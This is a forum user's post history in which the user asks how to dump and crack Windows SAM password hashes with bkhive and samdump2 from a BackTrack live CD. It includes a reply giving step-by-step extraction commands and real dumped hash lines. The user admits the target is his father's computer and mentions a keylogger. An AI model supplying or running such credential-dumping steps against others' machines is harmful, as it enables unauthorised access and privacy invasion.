Jump to content

cheers12

Active Members
  • Posts

    7
  • Joined

  • Last visited

Posts posted by cheers12

  1. But in answer to your blank LM hash, you will find if a password is longer than 14 characters there is no LM hash stored

    oh really?....then people cant crack it with the samdump2?

  2. I am sure that my dad isnt running any novell netware or anything similar to that...i actually got in before TWICE by finding his LM hash and cracking it...but it doesnt work now....maybe a key logger would work

  3. Few things.

    #1 If your using the ophcrack live cd, you can't write to the harddrive, only to the virtual home directory in ophcrack.

    #2 You need to be in the path of windows/system32/config

    #3 Your getting the usage prompt because your typing in the command wrong or it isnt being done against the correct file in that directory

    -do an ls and see if you get a listing that includes the SAM file. If so, you should be in the windows/system32/config  and you can continue with:

    bkhive SYSTEM > /home/temp.txt

    the above dumps a temp file to the home directory which will be the keyfile (use SYSTEM, not an email address)

    then:

    samdump2 SAM /home/temp.text > /home/hashes.txt

    now cd to /home/ and do an ls and you will see the hashes.txt file. Copy it to a usb drive or FTP it somewhere on the internet to reteive.

    If you have another version of linux you can install BKHive and Samdump2 to any other linux installation or add it to another live cd. This would be good because I noticed that none of the programs on the ophcrack cd seem to work(at least none of the ones from the gui menu, but ftp and terminal do work as well as the automatic cracking program).

    It also looks like you got a dump of the file, but there is no password set for the accounts Administrator or Lewis, so I don' see where you need to take this further. If it was yoru pc, you should know weather there are passwords set for each account.

    i am using backtrack2 and i just wanna get the password for the accounts...cuz im locked out....btw i followed the instruction from the iron geek website, http://www.irongeek.com/i.php?page=videos/backtrackplaintext

  4. this is what i typed into the konsole

    Bkhive ncuomo@studenti.unina.it
    
    Usage:
    bkhive systemhive keyfile
    bt ~ # samdump2
    Samdump2 ncuomo@studenti.unina.it
    This product includes cryptographic software written
    by Eric Young (eay@cryptsoft.com)
    
    Usage:
    samdump2 samhive keyfile
    bt ~ # bkhive /mnt/hda1/WINDOWS/system32/config/system key
    Bkhive ncuomo@studenti.unina.it
    
    Bootkey: ae8961060eb3c10905d33e3a9642441c
    bt ~ # ls
    Desktop/  Set IP address  key  sample_scripts/
    bt ~ # samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key
    Samdump2 ncuomo@studenti.unina.it
    This product includes cryptographic software written
    by Eric Young (eay@cryptsoft.com)
    
    Administrator:500:aad3b435b51404eeaad3b435b51404ee::::
    No password for user Administrator(500)
    Guest:501:aad3b435b51404eeaad3b435b51404ee::::
    No password for user Guest(501)
    HelpAssistant:1000:66fd5d21ed6da6a466ecaa3d454974cf:a338396acb83ec16f1a14179f9a254bf:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee::::
    No password for user SUPPORT_388945a0(1002)
    Lewis:1003:aad3b435b51404eeaad3b435b51404ee::::
    No password for user Lewis(1003)
    bt ~ #

    what did i do wrong?

  5. Hi, I have been trying to hack into my own computer for penetration test but i found something strange about the LM i am trying to crack

    Administrator:500:aad3b435b51404eeaad3b435b51404ee::::
    No password for user Administrator(500)
    Guest:501:aad3b435b51404eeaad3b435b51404ee::::
    No password for user Guest(501)
    HelpAssistant:1000:ddb78c747f0f0851cf29c2aea1f1547c:49b99f049aa622309f0b0519d314c30b:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee::::
    No password for user SUPPORT_388945a0(1002)
    Lewis:1003:aad3b435b51404eeaad3b435b51404ee::::
    No password for user Lewis(1003)

    I am sure there is passwords set for all accounts. can anyone help me? (I am using Backtrack2 with Bkhive and samdump2 and www. plain-text. info)

×
×
  • Create New...